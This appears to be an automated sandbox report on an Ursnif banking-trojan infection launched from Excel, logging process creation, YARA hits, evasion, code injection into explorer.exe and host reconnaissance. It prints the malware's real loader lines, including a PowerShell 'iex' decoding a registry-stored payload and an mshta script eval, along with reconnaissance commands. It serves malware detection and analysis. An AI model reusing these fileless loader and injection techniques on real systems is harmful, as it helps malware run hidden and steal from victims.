Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\47278A61-FA3B-119B-3C6B-CED530CFE2D9').apiMgcfg))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\8pjpp9kb.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vl8o3v8u.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES6C1D.tmp' 'c:\Users\user\AppData\Local\Temp\CSC6C1C.tmp'
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8BAE.tmp' 'c:\Users\user\AppData\Local\Temp\CSC8BAD.tmp'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\29B8.bi1'
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\29B8.bi1'
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C 'ipconfig /all >> C:\Users\user\AppData\Local\Temp\B55E.bin1'
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C 'systeminfo.exe > C:\Users\user\AppData\Local\Temp\A8F1.bin1'
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000004.00000003.2382947063.0000000004910000.00000004.00000001.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000014.00000002.2415948225.0000000001FB0000.00000002.00000001.sdmp

Data Obfuscation:

Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\47278A61-FA3B-119B-3C6B-CED530CFE2D9').apiMgcfg))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\47278A61-FA3B-119B-3C6B-CED530CFE2D9').apiMgcfg))
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\8pjpp9kb.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vl8o3v8u.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\8pjpp9kb.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vl8o3v8u.cmdline'
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0234F304 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey, 4_2_0234F304
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003D3E60 push 003D3EEDh; ret 4_2_003D3EE5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00386040 push 0038606Ch; ret 4_2_00386064
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003960F0 push ecx; mov dword ptr [esp], edx 4_2_003960F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00396134 push ecx; mov dword ptr [esp], edx 4_2_00396139
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00394104 push 00394151h; ret 4_2_00394149
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00398174 push ecx; mov dword ptr [esp], ecx 4_2_00398179
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003A8404 push 003A845Dh; ret 4_2_003A8455
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0039447C push 003944A8h; ret 4_2_003944A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0039C53C push ecx; mov dword ptr [esp], edx 4_2_0039C53E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003D860C push 003D863Fh; ret 4_2_003D8637
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003A8A7C push 003A8ABFh; ret 4_2_003A8AB7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00386ABC push ecx; mov dword ptr [esp], eax 4_2_00386ABD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003A8AF4 push 003A8B20h; ret 4_2_003A8B18
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003A8B2C push 003A8B64h; ret 4_2_003A8B5C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0038CB64 push ecx; mov dword ptr [esp], edx 4_2_0038CB69
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003D8B58 push 003D8B90h; ret 4_2_003D8B88
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003BCB50 push 003BCB7Ch; ret 4_2_003BCB74
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003D8B9C push 003D8BC8h; ret 4_2_003D8BC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003D8BD4 push 003D8C00h; ret 4_2_003D8BF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003A8BC0 push 003A8BECh; ret 4_2_003A8BE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003AEC2C push ecx; mov dword ptr [esp], edx 4_2_003AEC30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003D8C0C push 003D8C32h; ret 4_2_003D8C2A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00386CA0 push 00386CCCh; ret 4_2_00386CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003A8C90 push 003A8CC3h; ret 4_2_003A8CBB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003A8CF0 push 003A8D1Ch; ret 4_2_003A8D14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003A6CF4 push 003A6D32h; ret 4_2_003A6D2A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003A6D3C push 003A6D68h; ret 4_2_003A6D60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003D4D10 push 003D4D8Dh; ret 4_2_003D4D85
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00382D00 push eax; ret 4_2_00382D3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003A6D74 push 003A6DACh; ret 4_2_003A6DA4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003A8D40 push 003A8D83h; ret 4_2_003A8D7B

Persistence and Installation Behavior:

Uses ipconfig to lookup or modify the Windows network settings
Source: unknown Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\fyjh\zglgy\lckhvmn.drhdh
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\yytr[1].png
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe File created: C:\Users\user\AppData\Local\Temp\vl8o3v8u.dll
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe File created: C:\Users\user\AppData\Local\Temp\8pjpp9kb.dll
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\yytr[1].png
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\fyjh\zglgy\lckhvmn.drhdh

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.2321839049.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321796165.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321745663.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2455042419.0000000002936000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2380930371.00000000028D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2416709074.0000000002340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321730520.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2321759010.00000000039CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2378828561.00000000022D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2416998966.0000000002890000.00000040.00000001.sdmp, type: MEMORY
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: kernel32.dll function: CreateProcessW address: 76F37000
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: kernel32.dll function: CreateProcessW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003B63F8 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 4_2_003B63F8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003CE8A4 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 4_2_003CE8A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003CF1C8 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 4_2_003CF1C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003A5390 IsIconic,GetWindowPlacement,GetWindowRect, 4_2_003A5390
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003B93D0 PostMessageA,PostMessageA,SendMessageA,70D9FFF6,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 4_2_003B93D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003B9AF0 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 4_2_003B9AF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003B9BA0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 4_2_003B9BA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003CDFF0 IsIconic,GetCapture, 4_2_003CDFF0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003ADDB8 4_2_003ADDB8
Tries to delay execution (extensive OutputDebugStringW loop)
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe Section loaded: OutputDebugStringW count: 168
Contains functionality to detect sandboxes (mouse cursor move detection)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject, 4_2_003B8940
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\yytr[1].png
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vl8o3v8u.dll
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8pjpp9kb.dll
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003ADDB8 4_2_003ADDB8
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\mshta.exe TID: 408 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2680 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\ipconfig.exe TID: 2236 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003851E8 GetModuleHandleA,70D9FFF6,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 4_2_003851E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00477AA8 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 4_2_00477AA8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02359B00 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 4_2_02359B00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0234E8CE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 4_2_0234E8CE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02349945 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 4_2_02349945
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02349F54 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 4_2_02349F54
Source: C:\Windows\explorer.exe Code function: 28_2_0291EEAC FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW, 28_2_0291EEAC
Source: C:\Windows\explorer.exe Code function: 28_2_0291537C FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose, 28_2_0291537C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0234BB01 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 4_2_0234BB01
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003A1078 GetSystemInfo, 4_2_003A1078
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: control.exe, 0000001A.00000003.2385378340.00000000000DC000.00000004.00000001.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0234F304 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey, 4_2_0234F304
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0235FEA3 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 4_2_0235FEA3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_028B72C4 ConvertStringSecurityDescriptorToSecurityDescriptorA,RtlAddVectoredExceptionHandler, 20_2_028B72C4
Source: C:\Windows\SysWOW64\rundll32.exe Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\vl8o3v8u.0.cs
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 76F819A0
Hijacks the control flow in another process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 1388 base: 76F819A0 value: FF
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 1388 base: 76F819A0 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 1388 base: 2560000 value: A0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 1388 base: 76F819A0 value: FF
Maps a DLL or memory area into another process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 1388
Source: C:\Windows\explorer.exe Thread register set: target process: 3060
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: FFF12E54
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 76F819A0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 2560000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 76F819A0
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\fyjh\zglgy\lckhvmn.drhdh,DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\47278A61-FA3B-119B-3C6B-CED530CFE2D9').apiMgcfg))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\8pjpp9kb.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vl8o3v8u.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES6C1D.tmp' 'c:\Users\user\AppData\Local\Temp\CSC6C1C.tmp'
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8BAE.tmp' 'c:\Users\user\AppData\Local\Temp\CSC8BAD.tmp'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\47278A61-FA3B-119B-3C6B-CED530CFE2D9\\\CRPPcapi'));if(!window.flag)close()</script>'

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0047A446 cpuid 4_2_0047A446
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 4_2_003853A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,GetACP, 4_2_0038C3B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 4_2_0038ADFC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 4_2_0038AE48
Source: C:\Windows\SysWOW64\rundll32.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 4_2_003854AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 4_2_00385C98
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 4_2_00385C96
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0234DEE0 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 4_2_0234DEE0
